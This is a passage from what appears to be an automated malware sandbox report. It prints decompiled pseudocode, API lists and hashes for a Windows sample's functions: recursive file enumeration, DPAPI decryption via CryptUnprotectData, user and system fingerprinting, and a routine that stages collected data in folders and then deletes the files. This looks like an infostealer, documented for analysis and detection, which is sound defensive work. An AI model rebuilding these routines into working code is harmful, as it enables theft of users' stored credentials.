                                                                                                                              • Opcode ID: 1cfaaa4263921e670d447bf10fd0bbaabef4cbf546bfbcacf261dfb8817fc39c
                                                                                                                              • Instruction ID: b0ee2a266da5aaddb125032d73e6c8a54dd55c1a0deb21e767daa8be60d16efc
                                                                                                                              • Opcode Fuzzy Hash: 1cfaaa4263921e670d447bf10fd0bbaabef4cbf546bfbcacf261dfb8817fc39c
                                                                                                                              • Instruction Fuzzy Hash: 003149B0A4021CDBDB64DF54DD89BE9B7B4FB48304F1042D9E519A6281CBB46EC4CF59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041E640, Relevance: 4.7, APIs: 3, Instructions: 236fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 76%
                                                                                                                              			E0041E640(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				char* _v872;
				intOrPtr* _v876;
				char _v877;
				char _v878;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr* _v892;
				intOrPtr* _v896;
				char _v897;
				char _v898;
				intOrPtr _v904;
				intOrPtr _v908;
				signed int _t103;
				int _t108;
				intOrPtr* _t109;
				int _t111;
				intOrPtr* _t113;
				void* _t117;
				void* _t119;
				void* _t121;
				intOrPtr _t143;
				char _t146;
				char _t151;
				char _t170;
				char _t171;
				intOrPtr _t197;
				intOrPtr _t198;
				signed int _t199;
				void* _t200;
				void* _t201;
				void* _t203;
				void* _t204;

				_t198 = __esi;
				_t197 = __edi;
				_t143 = __ebx;
				_t103 =  *0x4301f4; // 0xe687535
				_v8 = _t103 ^ _t199;
				_t172 =  &_v276;
				 *0x432768( &_v276,  *0x4324d0, _a8);
				_t201 = _t200 + 0xc;
				_t108 = FindFirstFileA( &_v276,  &_v604); // executed
				_v280 = _t108;
				if(_v280 != 0xffffffff) {
					do {
						_v872 = ".";
						_v876 =  &(_v604.cFileName);
						while(1) {
							_t109 = _v876;
							_t146 =  *_t109;
							_v877 = _t146;
							if(_t146 !=  *_v872) {
								break;
							}
							if(_v877 == 0) {
								L7:
								_v884 = 0;
								L9:
								_v888 = _v884;
								if(_v888 == 0) {
									L18:
									goto L27;
								} else {
									_v892 = "..";
									_v896 =  &(_v604.cFileName);
									while(1) {
										_t113 = _v896;
										_t151 =  *_t113;
										_v897 = _t151;
										if(_t151 !=  *_v892) {
											break;
										}
										if(_v897 == 0) {
											L15:
											_v904 = 0;
											L17:
											_v908 = _v904;
											if(_v908 != 0) {
												 *0x432768( &_v868,  *0x4322bc, _a8,  &(_v604.cFileName));
												_t117 = E004052FA(_t198,  &(_v604.cFileName),  *0x4322d0);
												_t203 = _t201 + 0x18;
												if(_t117 != 0) {
													_t119 = E004052FA(_t198,  &(_v604.cFileName),  *0x4320e4);
													_t204 = _t203 + 8;
													if(_t119 != 0) {
														_t121 = E004052FA(_t198,  &(_v604.cFileName),  *0x432154);
														_t201 = _t204 + 8;
														if(_t121 != 0) {
															if((_v604.dwFileAttributes & 0x00000010) != 0) {
																E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
																_t201 = _t201 + 0x14;
															}
														} else {
															E0041DA80(_t143, _t197, _t198,  &_v868, _a4, _a12, _a16, _a20); // executed
															_push(_a20);
															_push(_a16);
															E0041B7B0(_t143, _t197, _t198,  &_v868, _a4, _a12); // executed
															E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
															_t201 = _t201 + 0x3c;
														}
													} else {
														E0041DCA0(_t143, _t197, _t198,  &_v868, _a4, _a12, _a16, _a20); // executed
														E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
														_t201 = _t204 + 0x28;
													}
												} else {
													E0041E0E0(_t143, _t197, _t198, _a4,  &_v868, _a12, _a16, _a20); // executed
													E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
													_t201 = _t203 + 0x28;
												}
												goto L27;
											}
											goto L18;
										}
										_t113 = _v896;
										_t170 =  *((intOrPtr*)(_t113 + 1));
										_v898 = _t170;
										_t41 = _v892 + 1; // 0x2e00002e
										if(_t170 !=  *_t41) {
											break;
										}
										_v896 = _v896 + 2;
										_v892 = _v892 + 2;
										if(_v898 != 0) {
											continue;
										}
										goto L15;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									_v904 = _t113;
									goto L17;
								}
							}
							_t109 = _v876;
							_t171 =  *((intOrPtr*)(_t109 + 1));
							_v878 = _t171;
							_t19 =  &(_v872[1]); // 0x2e000000
							if(_t171 !=  *_t19) {
								break;
							}
							_v876 = _v876 + 2;
							_v872 =  &(_v872[2]);
							if(_v878 != 0) {
								continue;
							}
							goto L7;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v884 = _t109;
						goto L9;
						L27:
						_t172 =  &_v604;
						_t111 = FindNextFileA(_v280,  &_v604); // executed
					} while (_t111 != 0);
					_t108 = FindClose(_v280); // executed
					goto L29;
				} else {
					L29:
					return E00404354(_t108, _t143, _v8 ^ _t199, _t172, _t197, _t198);
				}
			}








































                                                                                                                              0x0041e640
                                                                                                                              0x0041e640
                                                                                                                              0x0041e640
                                                                                                                              0x0041e649
                                                                                                                              0x0041e650
                                                                                                                              0x0041e65e
                                                                                                                              0x0041e665
                                                                                                                              0x0041e66b
                                                                                                                              0x0041e67c
                                                                                                                              0x0041e682
                                                                                                                              0x0041e68f
                                                                                                                              0x0041e696
                                                                                                                              0x0041e696
                                                                                                                              0x0041e6a6
                                                                                                                              0x0041e6ac
                                                                                                                              0x0041e6ac
                                                                                                                              0x0041e6b2
                                                                                                                              0x0041e6b4
                                                                                                                              0x0041e6c2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e6cb
                                                                                                                              0x0041e6fe
                                                                                                                              0x0041e6fe
                                                                                                                              0x0041e715
                                                                                                                              0x0041e71b
                                                                                                                              0x0041e728
                                                                                                                              0x0041e7c2
                                                                                                                              0x00000000
                                                                                                                              0x0041e72e
                                                                                                                              0x0041e72e
                                                                                                                              0x0041e73e
                                                                                                                              0x0041e744
                                                                                                                              0x0041e744
                                                                                                                              0x0041e74a
                                                                                                                              0x0041e74c
                                                                                                                              0x0041e75a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e763
                                                                                                                              0x0041e796
                                                                                                                              0x0041e796
                                                                                                                              0x0041e7ad
                                                                                                                              0x0041e7b3
                                                                                                                              0x0041e7c0
                                                                                                                              0x0041e7e0
                                                                                                                              0x0041e7f6
                                                                                                                              0x0041e7fb
                                                                                                                              0x0041e800
                                                                                                                              0x0041e855
                                                                                                                              0x0041e85a
                                                                                                                              0x0041e85f
                                                                                                                              0x0041e8b4
                                                                                                                              0x0041e8b9
                                                                                                                              0x0041e8be
                                                                                                                              0x0041e92b
                                                                                                                              0x0041e947
                                                                                                                              0x0041e94c
                                                                                                                              0x0041e94c
                                                                                                                              0x0041e8c0
                                                                                                                              0x0041e8d7
                                                                                                                              0x0041e8e2
                                                                                                                              0x0041e8e6
                                                                                                                              0x0041e8f6
                                                                                                                              0x0041e918
                                                                                                                              0x0041e91d
                                                                                                                              0x0041e91d
                                                                                                                              0x0041e861
                                                                                                                              0x0041e878
                                                                                                                              0x0041e89a
                                                                                                                              0x0041e89f
                                                                                                                              0x0041e89f
                                                                                                                              0x0041e802
                                                                                                                              0x0041e819
                                                                                                                              0x0041e83b
                                                                                                                              0x0041e840
                                                                                                                              0x0041e840
                                                                                                                              0x00000000
                                                                                                                              0x0041e800
                                                                                                                              0x00000000
                                                                                                                              0x0041e7c0
                                                                                                                              0x0041e765
                                                                                                                              0x0041e76b
                                                                                                                              0x0041e76e
                                                                                                                              0x0041e77a
                                                                                                                              0x0041e77d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e77f
                                                                                                                              0x0041e786
                                                                                                                              0x0041e794
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e794
                                                                                                                              0x0041e7a2
                                                                                                                              0x0041e7a4
                                                                                                                              0x0041e7a7
                                                                                                                              0x00000000
                                                                                                                              0x0041e7a7
                                                                                                                              0x0041e728
                                                                                                                              0x0041e6cd
                                                                                                                              0x0041e6d3
                                                                                                                              0x0041e6d6
                                                                                                                              0x0041e6e2
                                                                                                                              0x0041e6e5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e6e7
                                                                                                                              0x0041e6ee
                                                                                                                              0x0041e6fc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e6fc
                                                                                                                              0x0041e70a
                                                                                                                              0x0041e70c
                                                                                                                              0x0041e70f
                                                                                                                              0x00000000
                                                                                                                              0x0041e94f
                                                                                                                              0x0041e94f
                                                                                                                              0x0041e95d
                                                                                                                              0x0041e963
                                                                                                                              0x0041e972
                                                                                                                              0x00000000
                                                                                                                              0x0041e691
                                                                                                                              0x0041e978
                                                                                                                              0x0041e985
                                                                                                                              0x0041e985

                                                                                                                              APIs
                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041E67C
                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0041E95D
                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0041E972
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3541575487-0
                                                                                                                              • Opcode ID: c92bd7faf16dffcffc2816398490ef8bca13cdd8a6ab111b19ae1ea951e02468
                                                                                                                              • Instruction ID: 9a695b1c06b5e9649a3d6d3fc0282213006664483c1bee77f7df638368a39451
                                                                                                                              • Opcode Fuzzy Hash: c92bd7faf16dffcffc2816398490ef8bca13cdd8a6ab111b19ae1ea951e02468
                                                                                                                              • Instruction Fuzzy Hash: 50A17CB6904218ABCB25DF65DC84ADBB7B9BB58300F0486CEF91993240E6349FC4CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041CB10, Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E0041CB10(intOrPtr _a4, char _a8, intOrPtr* _a12, long* _a16) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _t23;

				_v16 = _a4;
				_v20 = _a8;
				_t23 =  *0x4327e0( &_v20, 0, 0, 0, 0, 0,  &_v12); // executed
				_v24 = _t23;
				if(_v24 != 0) {
					 *_a16 = _v12;
					 *_a12 = LocalAlloc(0x40,  *_a16);
					if( *_a12 != 0) {
						E00409240( *_a12, _v8,  *_a16);
					}
				}
				return LocalFree(_v8) & 0xffffff00 | _v24 != 0x00000000;
			}









                                                                                                                              0x0041cb19
                                                                                                                              0x0041cb1f
                                                                                                                              0x0041cb34
                                                                                                                              0x0041cb3a
                                                                                                                              0x0041cb41
                                                                                                                              0x0041cb49
                                                                                                                              0x0041cb5c
                                                                                                                              0x0041cb64
                                                                                                                              0x0041cb76
                                                                                                                              0x0041cb7b
                                                                                                                              0x0041cb64
                                                                                                                              0x0041cb92

                                                                                                                              APIs
                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041CB34
                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 0041CB53
                                                                                                                              • LocalFree.KERNEL32(?), ref: 0041CB82
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2068576380-0
                                                                                                                              • Opcode ID: b780c5da4f36e3f8844576dea2755cae7d1c8c5e28f2d047ea10ed4f2b2f8513
                                                                                                                              • Instruction ID: d8babcbbd2f812b4631016485bb53f436d95c30e894a7a7b7900c6fdcf07d794
                                                                                                                              • Opcode Fuzzy Hash: b780c5da4f36e3f8844576dea2755cae7d1c8c5e28f2d047ea10ed4f2b2f8513
                                                                                                                              • Instruction Fuzzy Hash: CB1109B8A00209EFCB04DF98D985AEEB7B5FF88300F104569E915A7390D774AE50CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041CB10, Relevance: 1.6, APIs: 1, Instructions: 51encryptionCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041CB34
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CryptDataUnprotect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 834300711-0
                                                                                                                              • Opcode ID: b780c5da4f36e3f8844576dea2755cae7d1c8c5e28f2d047ea10ed4f2b2f8513
                                                                                                                              • Instruction ID: d8babcbbd2f812b4631016485bb53f436d95c30e894a7a7b7900c6fdcf07d794
                                                                                                                              • Opcode Fuzzy Hash: b780c5da4f36e3f8844576dea2755cae7d1c8c5e28f2d047ea10ed4f2b2f8513
                                                                                                                              • Instruction Fuzzy Hash: CB1109B8A00209EFCB04DF98D985AEEB7B5FF88300F104569E915A7390D774AE50CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B1E0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E0041B1E0() {
				long _v8;
				signed int _v12;
				char _v276;
				signed int _t7;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t20;

				_t7 =  *0x4301f4; // 0xe687535
				_v12 = _t7 ^ _t20;
				_v8 = 0x104;
				GetUserNameA( &_v276,  &_v8); // executed
				return E00404354( &_v276, _t13, _v12 ^ _t20, _t17, _t18, _t19);
			}












                                                                                                                              0x0041b1e9
                                                                                                                              0x0041b1f0
                                                                                                                              0x0041b1f3
                                                                                                                              0x0041b205
                                                                                                                              0x0041b21e

                                                                                                                              APIs
                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 0041B205
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: NameUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2645101109-0
                                                                                                                              • Opcode ID: 56bdb6a72e0dac87f3f55412b30fcb29bf9813379c3705124fa6675d9c080625
                                                                                                                              • Instruction ID: 8133e80d8c9d2218205d3359472fc9bf3f4468e9244e7b16e2da7542de10471a
                                                                                                                              • Opcode Fuzzy Hash: 56bdb6a72e0dac87f3f55412b30fcb29bf9813379c3705124fa6675d9c080625
                                                                                                                              • Instruction Fuzzy Hash: 01E0E071D0010C9BCF19EF64D9555DDB7F8EB0C304F4006EDD51597140DA755788CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B4E0, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041B4E0() {
				struct _SYSTEM_INFO _v40;

				GetSystemInfo( &_v40); // executed
				return _v40.dwNumberOfProcessors;
			}




                                                                                                                              0x0041b4ea
                                                                                                                              0x0041b4f6

                                                                                                                              APIs
                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 0041B4EA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 31276548-0
                                                                                                                              • Opcode ID: 1cc8d28b8b4605765d93da9d3af6540c8237135d299b3c6776b7cd0520ddb65e
                                                                                                                              • Instruction ID: 89a359fd46148dc4c38142b92a7a9c3d480bc9270c14ad80602954946b5873e9
                                                                                                                              • Opcode Fuzzy Hash: 1cc8d28b8b4605765d93da9d3af6540c8237135d299b3c6776b7cd0520ddb65e
                                                                                                                              • Instruction Fuzzy Hash: AAC04C7590421C978A00EAE5994989AB7BCF608501B4005A1ED1993240E661E95486E5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420BE0, Relevance: 84.5, APIs: 56, Instructions: 529stringfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 83%
                                                                                                                              			E00420BE0(void* __ebx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v1024;
				char _v1352;
				char _v41352;
				char _v42352;
				char _v43352;
				char _v44352;
				char _v45352;
				char _v46352;
				char _v47352;
				char _v48352;
				char _v49352;
				char _v50352;
				char _v51352;
				char _v52352;
				char _v53352;
				char _v54352;
				char _v55352;
				char _v56352;
				void* _v56356;
				void* _v56360;
				char _v56361;
				void* _v56368;
				unsigned int _v56372;
				void* _v56376;
				char _v56377;
				void* _v56384;
				void* _v56388;
				char _v56389;
				void* _v56396;
				signed int _v56400;
				void* _v56404;
				char _v56405;
				intOrPtr* _v56412;
				intOrPtr _v56416;
				char _v56417;
				intOrPtr _v56424;
				void* __edi;
				void* __esi;
				signed int _t155;
				signed int _t156;
				CHAR* _t182;
				CHAR* _t184;
				CHAR* _t186;
				CHAR* _t188;
				CHAR* _t190;
				CHAR* _t192;
				CHAR* _t194;
				CHAR* _t196;
				void* _t202;
				CHAR* _t205;
				intOrPtr _t215;
				CHAR* _t220;
				CHAR* _t225;
				CHAR* _t230;
				intOrPtr _t253;
				intOrPtr _t257;
				CHAR* _t260;
				CHAR* _t269;
				CHAR* _t273;
				void* _t277;
				intOrPtr _t313;
				intOrPtr _t317;
				CHAR* _t319;
				CHAR* _t321;
				intOrPtr _t332;
				CHAR* _t337;
				CHAR* _t338;
				CHAR* _t339;
				signed int _t350;
				int _t353;
				signed int _t361;
				int _t364;
				intOrPtr _t371;
				intOrPtr _t372;
				intOrPtr _t373;
				intOrPtr _t374;
				intOrPtr _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				intOrPtr _t378;
				CHAR* _t379;
				CHAR* _t380;
				intOrPtr _t384;
				CHAR* _t388;
				CHAR* _t390;
				CHAR* _t403;
				CHAR* _t404;
				CHAR* _t405;
				signed int _t411;
				void* _t415;
				void* _t416;
				void* _t425;
				void* _t426;
				signed int _t427;
				void* _t428;
				void* _t466;
				void* _t470;
				void* _t475;

				_t475 = __eflags;
				_t294 = __ebx;
				E00412A40(0xdc58);
				_t155 =  *0x4301f4; // 0xe687535
				_t156 = _t155 ^ _t427;
				_v24 = _t156;
				 *[fs:0x0] =  &_v16;
				E004091C0( &_v42352, 0, 0x3e8);
				E004091C0( &_v56352, 0, 0x3e8);
				E004091C0( &_v55352, 0, 0x3e8);
				E004091C0( &_v47352, 0, 0x3e8);
				E004091C0( &_v52352, 0, 0x3e8);
				E004091C0( &_v54352, 0, 0x3e8);
				E004091C0( &_v1024, 0, 0x3e8);
				E004091C0( &_v53352, 0, 0x3e8);
				E004091C0( &_v46352, 0, 0x3e8);
				E004091C0( &_v51352, 0, 0x3e8);
				E004091C0( &_v49352, 0, 0x3e8);
				E004091C0( &_v45352, 0, 0x3e8);
				E004091C0( &_v48352, 0, 0x3e8);
				E004091C0( &_v50352, 0, 0x3e8);
				E004091C0( &_v44352, 0, 0x3e8);
				E004091C0( &_v43352, 0, 0x3e8);
				E004091C0( &_v41352, 0, 0x9c40);
				E00421620( &_v1352, _t415, _t425, 0x4294cf, 0xfde9, 0, 0, 0); // executed
				_v8 = 0;
				_t371 =  *0x4326d8; // 0x42a088
				_t182 =  *0x432244; // 0x2330590
				wsprintfA( &_v46352, _t182, _t371);
				_t372 =  *0x4326d8; // 0x42a088
				_t184 =  *0x432520; // 0x23358a0
				wsprintfA( &_v51352, _t184, _t372);
				_t373 =  *0x4326d8; // 0x42a088
				_t186 =  *0x43252c; // 0x23358b8
				wsprintfA( &_v49352, _t186, _t373);
				_t374 =  *0x4326d8; // 0x42a088
				_t188 =  *0x4326e4; // 0x2335960
				wsprintfA( &_v45352, _t188, _t374);
				_t375 =  *0x4326d8; // 0x42a088
				_t190 =  *0x43259c; // 0x2335870
				wsprintfA( &_v48352, _t190, _t375);
				_t376 =  *0x4326d8; // 0x42a088
				_t192 =  *0x43256c; // 0x2335978
				wsprintfA( &_v50352, _t192, _t376);
				_t377 =  *0x4326d8; // 0x42a088
				_t194 =  *0x432294; // 0x2335840
				wsprintfA( &_v44352, _t194, _t377);
				_t378 =  *0x4326d8; // 0x42a088
				_t196 =  *0x4322e8; // 0x2335948
				wsprintfA( &_v43352, _t196, _t378);
				_t379 =  *0x432570; // 0x2330560
				 *0x4328c4( &_v55352, _t379, _t156, _t415, _t425,  *[fs:0x0], E0042673D, 0xffffffff);
				 *0x4328c4( &_v55352, E0041A580(_t379, _t415, _t425, _t475, 0xf));
				_t202 = E0041A580(_t379, _t415, _t425, _t475, 0xa);
				_t380 =  *0x4326f4; // 0x23315f0
				wsprintfA( &_v56352, _t380, _t202);
				_t205 =  *0x4322bc; // 0x2330540
				wsprintfA( &_v42352, _t205,  &_v55352,  &_v56352);
				 *0x4328c4( &_v47352,  &_v55352);
				_t313 =  *0x4322e0; // 0x23358d0
				 *0x4328c4( &_v47352, _t313);
				 *0x4328c4( &_v52352,  &_v55352);
				_t384 =  *0x4326a0; // 0x2331528
				 *0x4328c4( &_v52352, _t384);
				 *0x4328c4( &_v54352,  &_v55352);
				_t215 =  *0x4322c4; // 0x2335888
				 *0x4328c4( &_v54352, _t215);
				 *0x4328c4( &_v1024,  &_v55352);
				_t317 =  *0x4320c4; // 0x2337e30
				 *0x4328c4( &_v1024, _t317);
				_t220 =  *0x432618; // 0x2331500
				E00420080(__ebx, _t415, _t425, _t475,  &_v50352, _t220); // executed
				_t388 =  *0x432568; // 0x2331438
				E00420080(__ebx, _t415, _t425, _t475,  &_v46352, _t388); // executed
				_t319 =  *0x4322f0; // 0x2331460
				E00420080(__ebx, _t415, _t425, _t475,  &_v51352, _t319); // executed
				_t225 =  *0x432398; // 0x2331488
				E00420080(_t294, _t415, _t425, _t475,  &_v49352, _t225); // executed
				_t390 =  *0x432458; // 0x23314b0
				E00420080(_t294, _t415, _t425, _t475,  &_v45352, _t390); // executed
				_t321 =  *0x432440; // 0x23314d8
				E00420080(_t294, _t415, _t425, _t475,  &_v48352, _t321); // executed
				_t230 =  *0x4320f4; // 0x23315c0
				E00420080(_t294, _t415, _t425, _t475,  &_v44352, _t230); // executed
				CreateDirectoryA( &_v55352, 0); // executed
				CreateDirectoryA( &_v47352, 0); // executed
				CreateDirectoryA( &_v52352, 0); // executed
				CreateDirectoryA( &_v54352, 0); // executed
				CreateDirectoryA( &_v1024, 0); // executed
				SetCurrentDirectoryA( &_v55352); // executed
				_push( &_v55352); // executed
				E0041EBD0(_t294, _t415, _t425); // executed
				SetCurrentDirectoryA( &_v55352); // executed
				E0041F330( &_v55352); // executed
				E00424F00(_t294, _t415, _t425,  &_v55352); // executed
				_t466 = _t428 + 0x190;
				SetCurrentDirectoryA( &_v55352); // executed
				if(E00422460(_t294,  &_v1352, _t415, _t425,  &_v43352) != 0) {
					_v56356 = E004214D0( &_v1352);
					_v56360 = _v56356;
					do {
						_v56361 =  *_v56356;
						_v56356 = _v56356 + 1;
					} while (_v56361 != 0);
					_v56368 = _v56360;
					_v56372 = _v56356 - _v56360;
					_v56376 =  &_v41352 + 0xffffffff;
					do {
						_v56377 =  *((intOrPtr*)(_v56376 + 1));
						_v56376 = _v56376 + 1;
					} while (_v56377 != 0);
					_t425 = _v56368;
					_t361 = _v56372 >> 2;
					_t364 = memcpy(_v56376, _t425, _t361 << 2) & 0x00000003;
					memcpy(_t425 + _t361 + _t361, _t425, _t364);
					_t466 = _t466 + 0x18;
					_t415 = _t425 + _t364 + _t364;
				}
				E00421580( &_v1352);
				E00420A30(_t294, _t415, _t425,  &_v41352,  &_v55352);
				SetCurrentDirectoryA( &_v55352); // executed
				E0041FC30(_t294,  &_v55352, _t415, _t425); // executed
				_t253 = E00416CE0( &_v56352, 0); // executed
				_v20 = _t253;
				E00420540(_t294, _t415, _t425, _v20, 0x4294df,  &_v55352); // executed
				E00417A10(_v20); // executed
				_t470 = _t466 + 0x20;
				_t257 =  *0x4320e8; // 0x2331538
				E004218C0(_t294,  &_v1352,  &_v56352, _t415, _t425, _t257,  &_v56352);
				_t332 =  *0x4326d8; // 0x42a088
				if(E00422460(_t294,  &_v1352, _t415, _t425, _t332) != 0) {
					_v56384 = E004214D0( &_v1352);
					_v56388 = _v56384;
					do {
						_v56389 =  *_v56384;
						_v56384 = _v56384 + 1;
					} while (_v56389 != 0);
					_v56396 = _v56388;
					_v56400 = _v56384 - _v56388;
					_v56404 =  &_v53352 + 0xffffffff;
					do {
						_v56405 =  *((intOrPtr*)(_v56404 + 1));
						_v56404 = _v56404 + 1;
					} while (_v56405 != 0);
					_t425 = _v56396;
					_t411 = _v56400;
					_t350 = _t411 >> 2;
					memcpy(_v56404, _t425, _t350 << 2);
					_t353 = _t411 & 0x00000003;
					memcpy(_t425 + _t350 + _t350, _t425, _t353);
					_t470 = _t470 + 0x18;
					_t415 = _t425 + _t353 + _t353;
				}
				_t260 =  *0x432570; // 0x2330560
				SetCurrentDirectoryA(_t260); // executed
				_v56412 =  &_v53352;
				_v56416 = _v56412 + 1;
				do {
					_v56417 =  *_v56412;
					_v56412 = _v56412 + 1;
				} while (_v56417 != 0);
				_v56424 = _v56412 - _v56416;
				_t488 = _v56424 - 4;
				if(_v56424 > 4) {
					E00420130(_t294, _t415, _t425, _t488,  &_v53352);
					_t470 = _t470 + 4;
				}
				E0041F540( &_v55352); // executed
				_t403 =  *0x432570; // 0x2330560
				SetCurrentDirectoryA(_t403); // executed
				RemoveDirectoryA( &_v55352);
				_t337 =  *0x432568; // 0x2331438
				DeleteFileA(_t337);
				_t404 =  *0x4322f0; // 0x2331460
				DeleteFileA(_t404);
				_t269 =  *0x432398; // 0x2331488
				DeleteFileA(_t269);
				_t338 =  *0x432458; // 0x23314b0
				DeleteFileA(_t338);
				_t405 =  *0x432440; // 0x23314d8
				DeleteFileA(_t405);
				_t273 =  *0x432618; // 0x2331500
				DeleteFileA(_t273);
				_t339 =  *0x4320f4; // 0x23315c0
				DeleteFileA(_t339); // executed
				E0041A720(_t294, _t415, _t425, _t488,  &_v55352); // executed
				_v8 = 0xffffffff;
				_t277 = E004215C0( &_v1352); // executed
				 *[fs:0x0] = _v16;
				_pop(_t416);
				_pop(_t426);
				return E00404354(_t277, _t294, _v24 ^ _t427,  &_v55352, _t416, _t426);
			}









































































































                                                                                                                              0x00420be0
                                                                                                                              0x00420be0
                                                                                                                              0x00420bf6
                                                                                                                              0x00420bfb
                                                                                                                              0x00420c00
                                                                                                                              0x00420c02
                                                                                                                              0x00420c0b
                                                                                                                              0x00420c1f
                                                                                                                              0x00420c35
                                                                                                                              0x00420c4b
                                                                                                                              0x00420c61
                                                                                                                              0x00420c77
                                                                                                                              0x00420c8d
                                                                                                                              0x00420ca3
                                                                                                                              0x00420cb9
                                                                                                                              0x00420ccf
                                                                                                                              0x00420ce5
                                                                                                                              0x00420cfb
                                                                                                                              0x00420d11
                                                                                                                              0x00420d27
                                                                                                                              0x00420d3d
                                                                                                                              0x00420d53
                                                                                                                              0x00420d69
                                                                                                                              0x00420d7f
                                                                                                                              0x00420d9d
                                                                                                                              0x00420da2
                                                                                                                              0x00420da9
                                                                                                                              0x00420db0
                                                                                                                              0x00420dbd
                                                                                                                              0x00420dc6
                                                                                                                              0x00420dcd
                                                                                                                              0x00420dda
                                                                                                                              0x00420de3
                                                                                                                              0x00420dea
                                                                                                                              0x00420df7
                                                                                                                              0x00420e00
                                                                                                                              0x00420e07
                                                                                                                              0x00420e14
                                                                                                                              0x00420e1d
                                                                                                                              0x00420e24
                                                                                                                              0x00420e31
                                                                                                                              0x00420e3a
                                                                                                                              0x00420e41
                                                                                                                              0x00420e4e
                                                                                                                              0x00420e57
